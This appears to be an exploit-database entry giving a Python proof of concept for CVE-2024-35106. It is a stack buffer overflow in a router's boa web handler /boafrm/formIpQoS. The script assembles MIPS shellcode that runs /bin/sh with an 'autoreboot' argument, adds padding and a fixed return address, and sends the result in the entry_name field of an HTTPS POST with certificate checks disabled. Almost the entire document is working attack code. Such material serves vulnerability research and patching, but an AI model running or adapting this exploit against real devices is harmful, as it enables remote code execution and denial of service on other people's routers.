Created on 2025-02-07 03:41 and updated on 2025-02-07 03:41.

Description

from pwn import *  
from hackebds import *  


def shutdown_shell_code():  
    """Assemble the MIPS32 little-endian Linux payload placed at the front of the overflow body.

    Builds ``execve("/bin/sh", ["autoreboot"], 0)`` followed by ``exit()`` with
    pwntools' ``shellcraft`` helpers and assembles the concatenated assembly
    text once. The visible code runs ``/bin/sh`` with ``"autoreboot"`` as its
    only argv entry; how the target treats that is not shown in this file.

    Returns:
        bytes: the assembled shellcode.
    """
    # ``context`` here is pwntools' global context (from ``from pwn import *``).
    # Later in this file the same name is rebound to an ``ssl`` context, but
    # this function is called at module level before that happens.
    context.update(arch='mips', os='linux', bits=32, endian='little')  

    cmd = "/bin/sh"  
    args = ["autoreboot"]  

    # Two shellcraft fragments are joined as assembly source, then assembled.
    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()  
    shellcode = asm(asmcode)  
    return shellcode  


power_off_code = shutdown_shell_code()  

# Filler between the end of the shellcode and the saved return address
# (0x138 = 312 bytes of 'A').
gap_code = (b'A') * 0x138

# This is the area that overwrites the saved return address (RET); whatever is
# placed here is where execution is redirected. The PoC uses a fixed address,
# 0x7f854710, written little-endian to match the context set in
# shutdown_shell_code().
RET_address = (b'\x10\x47\x85\x7f')  
# Trailing filler after the return address (0x40 = 64 bytes of 'C').
stack_gap = (b'C') * 0x40  

print("power_off_code_length")  
print(len(power_off_code))  

# Final body layout: shellcode | 'A' * 0x138 | RET | 'C' * 0x40.
# NOTE(review): the long single-byte runs and the raw 4-byte address make this
# body straightforward to flag in request inspection on the defending side.
final_code = power_off_code + gap_code + RET_address + stack_gap  

import socket  
import ssl  

# Server Address and Port  
# NOTE(review): a private-range address, presumably the device's LAN
# interface — confirm against the lab setup before running.
HOST = '192.168.1.254'  
PORT = 443  

# Create an SSL socket for HTTPS connection
# NOTE: this rebinds ``context`` (pwntools' global brought in by
# ``from pwn import *``). shutdown_shell_code() has already run above, so
# nothing below depends on the pwntools object.
context = ssl.create_default_context()  
context.set_ciphers('HIGH:!DH:!aNULL')  
# Hostname checking and certificate verification are both disabled, so any
# certificate the device presents (for instance a self-signed one) is accepted.
context.check_hostname = False  
context.verify_mode = ssl.CERT_NONE  

with socket.create_connection((HOST, PORT)) as sock:  
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  
        # Request body: the ip_qos form fields, with the overflow payload
        # appended as the value of the last field, ``entry_name``. The other
        # fields carry plausible values, presumably so the handler accepts the
        # form (the author's note: "parameter for evade verification").
        send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code  

        # POST request headers. Adjacent bytes literals are joined by the
        # parser, so this evaluates to one request line plus Host,
        # Content-Type, Content-Length (computed over send_byte) and
        # "Connection: close", terminated by the blank line.
        headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \  
                  b"Host: " + HOST.encode('utf-8') + b"\r\n" \  
                                                     b"Content-Type: application/octet-stream\r\n" \  
                                                     b"Content-Length: " + str(len(send_byte)).encode(  
            'utf-8') + b"\r\nConnection: close\r\n\r\n"  

        # Send request (combine headers and body)  
        ssock.send(headers + send_byte)  

        # Receive response: read until the server closes the connection
        # (recv returns an empty bytes object).
        response = b""  
        while True:  
            data = ssock.recv(1024)  
            if not data:  
                break  
            response += data  

        # Print the raw response, decoded as UTF-8.
        print(response.decode('utf-8'))

Associated vulnerability

CVE-2024-35106

Meta

[
   {
      ref: [
         "https://github.com/laskdjlaskdj12/CVE-2024-35106-POC",
      ],
   },
]

Author

Cédric Bonhomme